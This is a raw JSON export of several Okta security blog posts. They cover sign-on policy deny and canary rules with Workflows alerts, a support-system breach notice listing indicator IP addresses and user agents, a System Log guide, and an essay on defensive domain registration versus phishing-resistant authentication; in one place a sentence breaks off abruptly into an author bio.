Event Hook for policy.evaluate_sign_on events). So your options for notifying admins are to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"check the Reports page on a regular basis (very manual),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"add the rule to your SIEM (close to real-time) or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"use a Scheduled Flow in Okta Workflows to check for these events at regular intervals.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below is a sample workflow I produced to illustrate the third option. To configure the Workflow, the admin first schedules the flow, enters the Target ID for the Catch-All Deny Policy Rule and enters the Okta Org name. The last bit of configuration required is a “Subtract” card that needs to be set to the same interval as the flow schedule.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5u5TwnovvPYpWp5NQPFj6A\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The flow then queries Okta System Log for DENY events that triggered our catch-all deny rule. We only continue to process the flow if one or more of these events are returned. For each event returned, we call a helper flow that sends a notification to the SOC.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3LiD0EQHPdlJqVgKI6az7\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The helper flow, listed below, creates a URL for the SOC alert, which provides analysts a one-click access to the event in the System Log of the Admin Console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5oHc96sVGt0nsshmNY5RnW\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I’m using Slack to notify admins, you could substitute the same card with an action from the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/connector-reference.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"pre-built connectors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for Teams, Jira, PagerDuty, ServiceNow, Gmail, Office365 and more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6JkbQCmxYyJCzkrmsDOnP0\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here’s my sample alert:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1hi45dgLZhhDmGHQUuVRxA\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When the analyst clicks on the link and they’re taken straight to the System Log console with the Unique ID for the deny event already populated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1KDPxrhHmICmBhyVWSellT\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A Canary Rule?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As previously discussed, there are some constraints that limit the ability to identify denied requests in real-time in anything other than a SIEM (check out \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Streaming, now in GA!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you require real-time feedback on the impact of a change immediately after you've made it you might also consider introducing what I (somewhat clumsily) call a temporary “Canary Rule” that allows user access after any MFA.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This rule would be one higher than your lowest ranked policy (the Catch-All “Deny Access” rule) but one lower than the rules that govern expected access conditions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This rule has to be able to authenticate legitimate users, with a simple policy rule: “allow access with any two factor types”.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To be clear, this canary is a rule that \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"should never be met\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" if your policies are tuned correctly. It exists only to alert your IDAM team whenever a user that is \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"more than likely legitimate\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" attempted to access your apps outside of expected policy conditions. Ideally the rule should only be enabled for a short period of time after policy conditions are changed, and disabled once you’re confident that your rule set is meeting all the expected conditions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1068Ah09QKDCJjUN4LGjQs\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Implementing a canary rule doesn’t negate the need for thorough testing in your preview environment or adhering to change management processes. It’s just an additional method of gaining confidence that a recent change in production is delivering the expected results.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Making the Canary sing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When a user attempts to sign-in and the Canary policy rule is evaluated, there should be a policy evaluation event with the ID and displayName associated with the canary policy in the target object.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So in my test org this could be either of the following:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and target.id eq \\\"[redacted string]\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and target.displayName eq \\\"Canary Rule\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While you could use a scheduled flow for this (as I did for the Catch-All Deny workflow), but with a bit of sticky tape and elastic bands I built a PoC that triggers at the start of every user session, and finds a corresponding policy evaluation event that meets some specific conditions. Where they match, the flow continues and prepares a Slack notification that provides analysts a link to the entire user session in System Log:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"65qbx6AK1lC7zDl5B7VJIH\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So that's it! I hope you're left understanding the two distinct use cases I've presented here:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Catch-All Deny\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" should be permanent. Queries for denied requests should be accessible via a Report or a scheduled flow.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Canary Rule\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" should be temporary, and attempts only to help IDAM analysts identify gaps in their policies. Queries for denied requests should be accessible via a Report and there are numerous ways to write workflows, given it creates authentication events.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I'm keen to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://infosec.exchange/@breditor\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"hear your feedback!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"* \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"If you find that a default catch-all rule isn’t editable, create a new “Deny by Default” rule and order it above the default rule.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T01:53:53.423Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2023/10/tracking-unauthorized-access-oktas-support-system","id":"60979cef-04c5-5f0c-8d3a-9da0c64aec8e","title":"Tracking Unauthorized Access to Okta's Support System","date":"2023-10-20T14:41:32+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security has identified adversarial activity that leveraged access to a stolen credential to access Okta's support case management system.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor was able to view files uploaded by certain Okta customers as part of recent support cases. It should be noted that the Okta support case management system is separate from the production Okta service, which is fully operational and has not been impacted. In addition, the Auth0/CIC case management system is not impacted by this incident.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Note: All customers who were impacted by this have been notified. If you’re an Okta customer and you have not been contacted with another message or method, there is no impact to your Okta environment or your support tickets.\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within the course of normal business, Okta support will ask customers to upload an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/troubleshooting-with-har.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"HTTP Archive (HAR)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" file, which allows for troubleshooting of issues by replicating browser activity. HAR files can also contain sensitive data, including cookies and session tokens, that malicious actors can use to impersonate valid users. Okta has worked with impacted customers to investigate, and has taken measures to protect our customers, including the revocation of embedded session tokens. In general, Okta recommends sanitizing all credentials and cookies/session tokens within a HAR file before sharing it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attacks such as this highlight the importance of remaining vigilant and being on the lookout for suspicious activity. We are sharing the following Indicators of Compromise to assist customers who wish to perform their own threat hunting activity. We recommend referring to our previously \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/02/user-sign-and-recovery-events-okta-system-log\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published advice\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on how to search System Log for any given suspicious session, user or IP. Please note that the majority of the indicators are commercial VPN nodes according to our enrichment information.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP Addresses\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"23.105.182.19\\n104.251.211.122\\n202.59.10.100\\n162.210.194.35 (BROWSEC VPN)\\n198.16.66.124 (BROWSEC VPN)\\n198.16.66.156 (BROWSEC VPN)\\n198.16.70.28 (BROWSEC VPN)\\n198.16.74.203 (BROWSEC VPN)\\n198.16.74.204 (BROWSEC VPN)\\n198.16.74.205 (BROWSEC VPN)\\n198.98.49.203 (BROWSEC VPN)\\n2.56.164.52 (NEXUS PROXY)\\n207.244.71.82 (BROWSEC VPN)\\n207.244.71.84 (BROWSEC VPN)\\n207.244.89.161 (BROWSEC VPN)\\n207.244.89.162 (BROWSEC VPN)\\n23.106.249.52 (BROWSEC VPN)\\n23.106.56.11 (BROWSEC VPN)\\n23.106.56.21 (BROWSEC VPN)\\n23.106.56.36 (BROWSEC VPN)\\n23.106.56.37 (BROWSEC VPN)\\n23.106.56.38 (BROWSEC VPN)\\n23.106.56.54 (BROWSEC VPN)\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User-Agents\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While the following user-agents are legitimate, they may be rare in your environment given the release of Chrome 99 in March 2022.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mozilla/5.0 (Windows NT 10.0) \\nAppleWebKit/537.36 (KHTML, like Gecko) \\nChrome/99.0.7113.93 Safari/537.36\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(Legitimate, but older user-agent)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) \\nAppleWebKit/537.36 (KHTML, like Gecko) \\nChrome/99.0.4844.83 Safari/537.36\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(Legitimate, but older user-agent)\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T01:51:14.460Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2023/02/user-sign-and-recovery-events-okta-system-log","id":"3c6b83ab-d9e6-5eab-a478-aca6fec5932a","title":"User Sign-in and Recovery Events in the Okta System Log","date":"2023-02-07T05:50:22+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During a security incident, it's critical that SOC analysts (or Okta admins) can rapidly identify all activity associated with a suspicious session, user or IP.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are often asked to provide some sort of \\\"cheat sheet\\\" for new analysts that are unfamiliar with the extensive library of events available in Okta's Event Library.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following blog post re-publishes a support article that offers a few of these shortcuts. Okta Security has also \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published a range of platform and bespoke detections\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for identifying suspicious activity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The events below are found in both Okta Classic Engine (OCE) and Okta Identity Engine (OIE).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Working with Okta System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To access the System Log, go to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Reports\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" > \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"System Log\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To view events in the System Log, type or paste a query into the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Search\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" field on the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"System Log\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" page, and press \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Enter\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search events by user\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To view sign-in events for a particular user, use this query as an example. Replace theThe Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.
"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/articles/2024/04/defensive-domain-registration-mugs-game","id":"55644c31-0632-528d-b757-fc42ee1cbacd","title":"Defensive Domain Registration is a Mug’s Game ","date":"2024-04-03T16:49:17+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" The time and effort spent on defensive domain registration would be better invested in writing phishing-resistant authentication policies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today I want to make the case that registering domains for the sole purpose of protecting against phishing is tackling the phishing problem from the wrong angle. It is, to use a very British idiom, a “mug’s game”: an effort that’s unlikely to yield much success. Most organizations register additional domains based on various permutations of their primary production domain. Sometimes domains are registered to deter potential competitors, and the registrations are aimed at protecting their brand from trademark infringement. Increasingly, we see organizations acquiring domains to deter attackers from registering domains used in social engineering campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once you get started on the latter, the pertinent question becomes how many permutations on your domain you’re willing to invest in. Where do you stop?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There is a stronger case to be made for registering key domains that help to catch emails gone awry (the inevitable “fat finger” errors). In the grand scheme of things, domains are cheap.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But once we start considering defensive domain registrations, the value of every subsequent registration diminishes. By using a tool like \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/elceef/dnstwist\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"dnstwist\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", you can very quickly see how big the game of whack-a-mole could be. With a 4 character domain name, dnstwist generates over 1000 domains. If you multiply this against additional brands and common phishing keywords (support, login, helpdesk, etc), the scope of the problem easily explodes by orders of magnitude.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conservatively, registering all these domains could easily cost $100k+ per year. Even after you’ve expended this effort, adversaries can always always find yet more permutations of your domain (or the services your users are familiar with) that you haven’t considered. And at the end of the day, registering those domains hasn’t moved the security needle one bit: we have merely expended scarce budget on a few surmountable hurdles for an attacker to side-step.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Let’s just eliminate the phishing problem?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Writing in this blog, my colleagues and I have implored Okta customers to embrace phishing-resistant factors like Okta FastPass and FIDO2 WebAuthn, for a number of good reasons.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Preventative controls are nearly always far more desirable than compensating controls. FastPass or WebAuthn can essentially eliminate phishing attacks that target user authentication. The same can’t be said for defensive domain registrations. The TL;DR is that phishing resistant methods of authentication cannot be phished the same way legacy factors like passwords, and basic MFA (OTP, SMS, etc) can, because they are scoped - that is, authentication is cryptographically tied - to the origin. In other words, a phishing-resistant factor will never authenticate to a domain that it was not enrolled in, even if the user has been tricked into visiting a malicious site.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Not only is this an effective security control, the user experience is far better than a password or any combination of legacy factors. As described in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Sign-in Trends Report\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", phishing-resistant factors including FastPass and WebAuthn are;\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Faster to enroll\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Faster to use\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Fail less often\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Are not susceptible to brute-force attacks\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Inherently more secure (Phishing-resistant)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Able to satisfy multiple factor requirements with a single user action (Biometric + Possession)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can I start using FastPass?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assuming you’re using Okta Identity Engine (OIE), FastPass is already available to you. If you’re still on Okta Classic, this is another great excuse to take the free upgrade to OIE.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here are some resources I recommend to help you get started:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/fp/fp-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass | Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-fastpass-deployment-guide/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Becoming phishing resistant with Okta FastPass | Step-by-step 